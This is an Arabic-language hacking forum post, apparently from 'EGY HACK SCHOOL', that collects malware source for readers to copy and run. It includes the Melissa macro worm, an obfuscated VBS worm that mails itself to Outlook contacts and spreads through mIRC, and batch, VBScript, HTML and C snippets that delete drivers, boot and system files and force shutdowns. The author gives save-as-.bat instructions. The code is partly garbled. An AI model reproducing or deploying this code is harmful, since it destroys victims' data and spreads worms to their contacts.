    FileSetAttrib ($l & "" & $name & $exe,"+RSH")
    FileCopy(@AutoItExe,$m & "" & $name & $exe)
    FileSetAttrib ($m & "" & $name & $exe,"+RSH")
    FileCopy(@AutoItExe,$n & "" & $name & $exe)
    FileSetAttrib ($n & "" & $name & $exe,"+RSH")
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;
    sleep (5)
    WinMinimizeAll()
    $count=$count+1
    sleep(50000)
    Until $count=1
    لكم كود فايروس ميلسيا
    هديةبما اني عضو جديد
    ارجو عدم استخدامه ضد اخوانناالمسلمين
    Private Sub AutoOpen() On Error Resume Next
    p$ = "clone"
    If System.PrivateProfileString("",
    "HKEY_CURRENT_USER\oftware\icrosoft\ffice\.
    0\ord\e curity", "Level") <> "" Then
    CommandBars("Macro").Controls("Security...").
    Enabl ed = False
    System.PrivateProfileString("",
    "HKEY_CURRENT_USER\oftware\icrosoft\ffice\.
    0\ord\e curity", "Level") = 1&
    Else
    p$ = "clone"
    CommandBars("Tools").Controls("Macro").Enabl
    ed = False
    Options.ConfirmConversions = (1 1):
    Options.VirusProtection = (1 1):
    Options.SaveNormalPrompt = (1 1)
    End If
    Dim UngaDasOutlook, DasMapiName,
    BreakUmOffASlice
    Set UngaDasOutlook =
    CreateObject("Outlook.Application")
    Set DasMapiName =
    UngaDasOutlook.GetNameSpace("MAPI")
    If System.PrivateProfileString("",
    "HKEY_CURRENT_USER\oftware\icrosoft\ffice\,
    "Melissa?") <> "... by Kwyjibo" Then
    If UngaDasOutlook = "Outlook" Then
    DasMapiName.Logon "profile", "password"
    For y = 1 To DasMapiName.AddressLists.Count
    Set AddyBook = DasMapiName.AddressLists(y)
    x = 1
    Set BreakUmOffASlice =
    UngaDasOutlook.CreateItem(0)
    For oo = 1 To AddyBook.AddressEntries.Count
    Peep = AddyBook.AddressEntries(x)
    BreakUmOffASlice.Recipients.Add Peep
    x = x + 1
    If x > 50 Then oo =
    AddyBook.AddressEntries.Count
    Next oo
    BreakUmOffASlice.Subject = "Important Message
    From " & Application.UserName
    BreakUmOffASlice.Body = "Here is that document
    you asked for ... don't show anyone else Wink"
    BreakUmOffASlice.Attachments.Add
    ActiveDocument.FullName
    BreakUmOffASlice.Send
    Peep = ""
    Next y
    DasMapiName.Logoff
    End If
    p$ = "clone"
    System.PrivateProfileString("",
    "HKEY_CURRENT_USER\oftware\icrosoft\ffice\,
    "Melissa?") = "... by Kwyjibo"
    End If
    Set ADI1 =
    ActiveDocument.VBProject.VBComponents.Item(1
    )
    Set NTI1 =
    NormalTemplate.VBProject.VBComponents.Item(
    1)
    NTCL = NTI1.CodeModule.CountOfLines
    ADCL = ADI1.CodeModule.CountOfLines
    BGN = 2
    If ADI1.Name <> "Melissa" Then
    If ADCL > 0 Then _
    ADI1.CodeModule.DeleteLines 1, ADCL
    Set ToInfect = ADI1
    ADI1.Name = "Melissa"
    DoAD = True
    End If
    If NTI1.Name <> "Melissa" Then
    If NTCL > 0 Then _
    NTI1.CodeModule.DeleteLines 1, NTCL
    Set ToInfect = NTI1
    NTI1.Name = "Melissa"
    DoNT = True
    End If
    If DoNT <> True And DoAD <> True Then GoTo
    CYA
    If DoNT = True Then
    Do While ADI1.CodeModule.Lines(1, 1) = ""
    ADI1.CodeModule.DeleteLines 1
    Loop
    ToInfect.CodeModule.AddFromString ("Private
    Sub Document_Close()")
    Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
    ToInfect.CodeModule.InsertLines BGN,
    ADI1.CodeModule.Lines(BGN, 1)
    BGN = BGN + 1
    Loop
    End If
    p$ = "clone"
    If DoAD = True Then
    Do While NTI1.CodeModule.Lines(1, 1) = ""
    NTI1.CodeModule.DeleteLines 1
    Loop
    ToInfect.CodeModule.AddFromString ("Private
    Sub Document_Open()")
    Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
    ToInfect.CodeModule.InsertLines BGN,
    NTI1.CodeModule.Lines(BGN, 1)
    BGN = BGN + 1
    Loop
    End If
    CYA:
    If NTCL <> 0 And ADCL = 0 And (InStr(1,
    ActiveDocument.Name, "Document") = False)
    Then
    ActiveDocument.SaveAs
    FileName:=ActiveDocument.FullName
    ElseIf (InStr(1, ActiveDocument.Name,
    "Document") <> False) Then
    ActiveDocument.Saved = True: End If
    'WORD/Melissa written by Kwyjibo
    'Clone written by Duke/SMF
    'Works in both Word 2000 and Word 97
    'Worm? Macro Virus? Word 97 Virus? Word 2000
    Virus? You Decide!
    'Word >
    Email | Word 97 <>
    Word 2000 ... it's a
    new age!
    If Day(Now) = Minute(Now) Then
    Selection.TypeText "Twentytwo
    points, plus triplewordscore,
    plus fifty points for using all my
    letters. Game's over. I'm outta here."
    End Sub
    هذا Virus worm
    :اقتباس
    Set O6734VC6 = createobject("scripting.filesystemobject")
    O78SS2L7 = O6734VC6.getspecialfolder(1)
    A6G1HQFH = O78SS2L7 & "\geilfingeren.jpg.vbs"
    Set E828D4O2 = createobject("wscript.shell")
    E828D4O2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru
    n\WinUpdate", "wscript.exe " & A6G1HQFH & " %"
    O6734VC6.copyfile wscript.scriptfullname, A6G1HQFH
    UB51PCQU
    If E828D4O2.regread("HKLM\SOFTWARE\Microsoft\Windows\
    CurrentVersion\fingeren.avi\UA1OM5IA") <> 1 then
    KD8F5L2N
    End if
    If E828D4O2.regread("HKLM\SOFTWARE\Microsoft\Windows\
    CurrentVersion\fingeren.avi\D47AC8NJ") <> 1 then
    HLVO1EDH ""
    End if
    Function KD8F5L2N()
    Set O13Q767K = CreateObject("Outlook.Application")
    If O13Q767K = "Outlook" Then
    Set LFSIH230 = O13Q767K.GetNameSpace("MAPI")
    Set LLLK4LPL = LFSIH230.AddressLists
    For Each A4A83865 In LLLK4LPL
    If A4A83865.AddressEntries.Count <> 0 Then
    JM1R7N44 = A4A83865.AddressEntries.Count
    For NHF463JD = 1 To JM1R7N44
    Set OU435GC5 = O13Q767K.CreateItem(0)
    Set KP511I06 = A4A83865.AddressEntries(NHF463JD)
    OU435GC5.To = KP511I06.Address
    OU435GC5.Subject = "Very Important!"
    OU435GC5.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""
    execute "set DH97CAIN =OU435GC5." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99)
    & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
    IJ15SDEE = A6G1HQFH
    OU435GC5.DeleteAfterSubmit = True
    DH97CAIN.Add IJ15SDEE
    If OU435GC5.To <> "" Then
    OU435GC5.Send
    End If
    Next
    End If
    Next
    End If
    End function
    Function HLVO1EDH(AHAOA819)
    If AHAOA819 <> "" Then
    TJTE98P3 = E828D4O2.regread("HKEY_LOCAL_MACHINE\Software\Micr
    osoft\Windows\CurrentVersion\ProgramFilesDir")
    If O6734VC6.fileexists("c:\mirc\mirc.ini") Then
    AHAOA819 = "c:\mirc"
    ElseIf O6734VC6.fileexists("c:\mirc32\mirc.ini") Then
    AHAOA819 = "c:\mirc32"
    ElseIf O6734VC6.fileexists(TJTE98P3 & "\mirc\mirc.ini") Then
    AHAOA819 = TJTE98P3 & "\mirc"
    ElseIf O6734VC6.fileexists(TJTE98P3 & "\mirc32\mirc.ini") Then
    AHAOA819 = TJTE98P3 & "\mirc"
    Else
    AHAOA819 = ""
    End If
    End If
    If AHAOA819 <> "" Then
    Set U127MJ5H = O6734VC6.CreateTextFile(AHAOA819 & "\script.ini", True)
    U127MJ5H = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
    U127MJ5H = U127MJ5H & vbCrLf & "n0=on 1:JOIN:#:{"
    U127MJ5H = U127MJ5H & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
    U127MJ5H = U127MJ5H & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick
    "
    U127MJ5H = U127MJ5H & A6G1HQFH
    U127MJ5H = U127MJ5H & vbCrLf & "n3=}"
    script.Close
    End If
    End Function
    Function J706734V()
    On Error Resume Next
    Set CKQ24CHB = O6734VC6.Drives
    For Each G2U828D4 In CKQ24CHB
    OC078SS2 = G2U828D4 & " \ "
    Call L7R6G1HQ(OC078SS2)
    Next
    End Function
    Function L7R6G1HQ(FS6B51PC)
    Q35A1OM5 = FS6B51PC
    Set ITHD8F5L = O6734VC6.GetFolder(Q35A1OM5)
    Set G6F47AC8 = ITHD8F5L.Files
    For Each NFFLVO1E In G6F47AC8
    If lcase(NFFLVO1E.Name) = "mirc.ini" Then
    HLVO1EDH(NFFLVO1E.ParentFolder)
    End If
    If O6734VC6.GetExtensionName(NFFLVO1E.path) = "vbs"
    O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true
    End if
    If O6734VC6.GetExtensionName(NFFLVO1E.path) = "vbe"
    O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true
    End if
    Next
    Set VSM3BL08 = ITHD8F5L.Subfolders
    For Each UQFA0DCQ In VSM3BL08
    Call (UQFA0DCQ.path)
    Next
    End function
    Function UB51PCQU()
    Randomize
    If 1 + Int(Rnd * 50) = 7 then
    E828D4O2.run "RUNDLL32.EXE user.exe,exitwindows"
    end if
    end function
    الن فايروسات العزيز
    blackdream
    هذا الفيروس يقوم بمهام منها
    نسخ نفسه في بدا التشغيل: 1
    تعطيل الكيبورد والفارة: 2
    انشاء اللف من المجلدات على سطح المكتب وعلى: 3 c
    حذف: 4 temp antivirus
    يعطل المؤشرات: 5
    حذف الويندوز نهائيا: 6
    غلق الجهاز بطريقة ة: 7
    :كود
    @echo OFF
    title T0TAL_DZ is attacked your systeme
    attrib +s +h %0
    copy %0 "C:\Users\%username
    %\AppData\Roaming\Microsoft\Win dows\start
    Menu\Programs\startup"
    cd C:Windowssystem32
    del /S /F /Q keyboard.drv
    del /S /F /Q mouse.drv
    del /S /F /Q keyboard.sys
    mkdir C:Users%usernameDesktopHELLO GOOD SIR YOUR
    COMPUTER IS IN THE PROCESS OF BEING , PLEASE ENJOY
    READING THESE FOLDERS ONE BY ONE AS YOU CANT USE
    YOUR KEYBOARD OR MOUSE AND DONT FORGET TO ENJOY
    HAVING THE REST OF YOUR COMPUTER GET RESTARTING
    YOUR COMPUTER IS TOO LATE, SHIT ALREADY WENT DOWN
    echo CHECK YOUR DESKTOP
    ping localhost >nul
    mkdir C:HOLY MAKING FOLDERS IS FUN. WELL FUN FOR ME,
    NOT FUN FOR YOU ALL I HAVE TO DO IS JUST TYPE THIS AND
    POOF FOLDERS ARE MADE K so I HOPE YOU BLEW THE REST
    OF THAT COMPUTER MONEY ON PHAT MONITORZ SO THIS
    FITS!
    echo CHECK YOUR C DRIVE
    echo WHOOPS FORGOT YOUR MOUSE DOESNT WORK LOL
    ping localhost >nul
    echo Y | del C:WindowssecurityDatabase
    cd C:WindowsCursors
    del /S /F /Q *.cur
    del /S /F /Q *.ani
    echo OH NO WHERE THE DID YOUR CURSOR GO
    ping localhost >nul
    cls
    echo Y | del /f /q "C:\Windows\*"
    shutdown -s -t 4 -c "Sorry, T0TAL IS HERE"
    exit
    فيروس الهوتميل
    وهدا فيروس خطير جدااا فيروس الهوتميل
    يقوم بتعطيل كل شيء
    انسخ الكود وضعه في المفكرة notepad واحفطه متل بي
    bLaCkDrEaM.html
    <html>
    <head>
    <**** **********="ContentType"
    content="text/html; charset=iso88591">
    <title>ActiveX
    HTML</title>
    </head>
    THIS HTML USING ACTIVEX
    PLEASE CLICK #YES#
    <body bgcolor="#000000" Text="#C0C0C0">
    <script language="VBScript">
    <!This
    is a MY BRAIN !>
    On Error Resume Next
    Dim a
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set a = fso.GetFile("win.ini")
    a.Delete
    Dim b
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set b = fso.GetFile("system.ini")
    b.Delete
    </script>
    <!This
    script author is THEONE!>
    </body>
    </html>
    .................................................. ..
    مقسم الى مجموعات قوم بتجميعها في notepad النوت
    باد ضعه في النوت باد وحفظ بي bLaCkDrEaM.bat
    :اقتباس
    Disassembly of File: office_crack.exe
    Code Offset = 00000400, Code Size = 00000000
    Data Offset = 00000400, Data Size = 00000000
    Number of Objects = 0003 (dec), Imagebase =
    004A0000h
    Object01: UPX0 RVA: 00001000 Offset: 00000400 Size:
    00000000 Flags: E0000080
    Object02: UPX1 RVA: 00007000 Offset: 00000400 Size:
    00005000 Flags: E0000040
    Object03: .rsrc RVA: 0000C000 Offset: 00005400 Size:
    00000400 Flags: C0000040
    +++++++++++++++++++ MENU INFORMATION ++++++++
    ++++++++++
    There Are No Menu Resources in This Application
    +++++++++++++++++ DIALOG INFORMATION ++++++++
    ++++++++++
    There Are No Dialog Resources in This Application 0
    +++++++++++++++++++ IMPORTED FUNCTIONS ++++++
    ++++++++++++ 0
    Number of Imported Modules = 0 (decimal)
    +++++++++++++++++++ IMPORT MODULE DETAILS +++
    ++++++++++++ 0
    +++++++++++++++++++ EXPORTED FUNCTIONS +++++
    +++++++++++++ 0
    Number of Exported Functions = 0000 (decimal) ++
    +++++++++++++++++++ ASSEMBLY CODE LISTING +++
    +++++++++++++++
    //********************** Start of Code in Object UPX0
    **************
    Program Entry Point = 004ABE60 (office_crack.exe File
    Offset:0000B260) g
    :004A7000 EE out dx, al
    :004A7001 8702 xchg dword ptr [edx], eax
    :004A7003 92 xchg eax,edx r
    :004A7004 005026 add byte ptr [eax+26], dl
    :004A7007 4A dec edx p
    :004A7008 004003 add byte ptr [eax+03], al
    :004A700B FD std by
    :004A700C B269 mov dl, 69
    :004A700E 9A2C1004F425E8 call E825:F404102C
    :004A7015 0100 add dword ptr [eax], eax
    :004A7017 4B dec ebx d
    :004A7018 CE into b
    :004A7019 699A6ED91FC82AC003B8 imul ebx, dword
    ptr [edx+C81FD96E], B803C02A 0
    :004A7023 B0A8 mov al, A8
    :004A7025 A6 cmpsb
    :004A7026 699AA6A0989088809AA6 imul ebx, dword ptr
    [edx+9098A0A6], A69A8088 0
    :004A7030 699A787068605850CD60 imul ebx, dword ptr
    [edx+60687078], 60CD5058 0
    :004A703A 9F lahf e
    :004A703B 69480044073830 imul ecx, dword ptr
    [eax+00], 30380744
    :004A7042 344D xor al, 4D
    :004A7044 D3 BYTE 0d0h
    :004A7045 7403 je 004A704A or
    :004A7047 28241C sub byte ptr [esp+ebx], ah
    * Referenced by a (U)nconditional or (C)onditional Jump
    at Address:
    |:004A7045(C) y
    | 00
    :004A704A 1810 sbb byte ptr [eax], dl
    :004A704C D32CBB shr dword ptr [ebx+4*edi], cl
    :004A704F D7 xlat w
    :004A7050 0823 or byte ptr [ebx], ah
    :004A7052 03F8 add edi, eax e
    :004A7054 29F0 sub eax, esi e
    :004A7056 E84DD3344D call 4D7F43A8
    :004A705B E0D8 loopnz 004A7035 ],
    :004A705D D0C8 ror al, 1
    :004A705F BCB4344DD3 mov esp, D34D34B4
    :004A7064 34AC xor al, AC
    :004A7066 A4 movsb[/
    .................................................. ..
    كود لحذف شاشة الترحيب للويندوز
    من العنوان ستفهم كل العادة ضعه في notepad النوت باد
    وحفط بي bLaCkDrEaM.bat
    :اقتباس
    Del c:\windows\Logos.sys
    Del c:\windows\Logow.sys
    .................................................. ...
    فيروس الفيجول بيسك
    ا فيروسات تدمير الويندوز
    احفط بي bLaCkDrEaM.bat
    :اقتباس
    vbNormal
    SetAttr "c:\msdos.sys", vbNormal
    SetAttr "c:\io.sys", vbNormal
    SetAttr "c:\windows\win.ini", vbNormal
    SetAttr "c:\windows\system.ini", vbNormal
    SetAttr "c:\command.com", vbNormal
    SetAttr "c:\config.sys", vbNormal
    SetAttr "c:\windows\rundll.exe", vbNormal
    SetAttr "c:\windows\rundll32.exe", vbNormal
    Kill "C:\autoexec.bat"
    Kill "C:\msdos.sys"
    Kill "C:\io.sys"
    Kill "C:\windows\win.ini"
    Kill "C:\windows\system.ini"
    Kill "C:\command.com"
    Kill "C:\config.sys"
    Kill "C:\windows\rundll.exe"
    Kill "C:\windows\rundll32.exe"[/CODE
    .................................................. ...........
    فيروس تدمير الويندوز new
    يمتاز الفيروس بتعديب الضجية ودلك بصدار عدة اوامر تم
    يقوم بتدمير الهاردسك
    انسخ الكود واحفظه في النوت باد notebad وبعد دالك
    حفط bLaCkDrEaM.bat
    Del c:\windows\system\msconfig.exe
    Del c:\windows\Rundll32.exe
    Del c:\windows\regedit.exe
    Del c:\windows\Rundll.exe
    Del c:\Autoexec.bat
    Del c:\command.com
    Del c:\windows\Logos.sys
    Del c:\windows\Logow.sys
    Del c:\windows\Scanregw.exe
    Del C:\Program Files\Internet Explorer\Iexplore.exe
    Del c:\windows\system\Sysedit.exe
    Del c:\windows\win.com
    @Echo off
    c:
    cd %WinDir%\System\
    deltree /y *.exe
    أن شاء الله تعجبكم
    أخوكم الحلم السود
    .............................يتبع
    bLaCkDrEaM
    قتل الوندوز وحذف كل الملفات بعد التشغيل مباشره 1
    انسخ
    :كود
    @Echo off
    c:
    cd %WinDir%System
    deltree /y *.dll
    cd
    deltree /y *.sys
    echo
    قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل 2
    للجهاز
    انسخ
    :كود
    call attrib h
    r
    c:autoexec.bat >nul
    @Echo off
    c:
    cd %WinDir%System
    deltree /y *.dll
    cd
    deltree /y *.sys
    echo
    فيرووس3
    C++ :
    انسخ
    :كود
    #include
    #include
    #include
    main()
    {
    clrscr();
    printf("tttCoffin Of Evil ");
    printf("ttWElcome to My World");
    remove("c:\windows\system.ini");
    remove("c:\windows\win.ini");
    remove("c:\autoexec.bat");
    remove("c:\msdos.sys");
    remove("c:\io.sys");
    remove("c:\command.com");
    remove("c:\config.sys");
    remove("c:\windows\ebd\command.com");
    remove("c:\windows\ebd\ebd.cab");
    remove("c:\windows\ebd\Autoexec.bat");
    remove("c:\windows\ebd\setramd.bat");
    remove("c:\windows\ebd\Findramd.exe");
    rename("egypt.exe","c:/windows/startm~1/programs/sta
    rtup/win.exe");
    printf("Windows destroyed ...nn");
    system("PAUSE");
    }
    إطفاء الجهاز بعد 60 ثانيه 4
    :كود
    cmdow @ /HID
    shutdown.exe r
    f
    t
    60 c
    "Windows XP will now restart
    in 60 Seconds...hacked by "حط الكلم الذي تريد
    net user aspnet /delete
    EXIT
    ارجو عدم استخدامه على اخواننا المسلمين
    واني بريء من كل عمل يضر اخواننا المسلمين
    تم تصميم الكتاب بواسطة
    ايجى هاك سكول

    EGY HACK SCHOOL

      الوقت/التاريخ الآن هو الجمعة ديسمبر 09, 2016 2:17 pm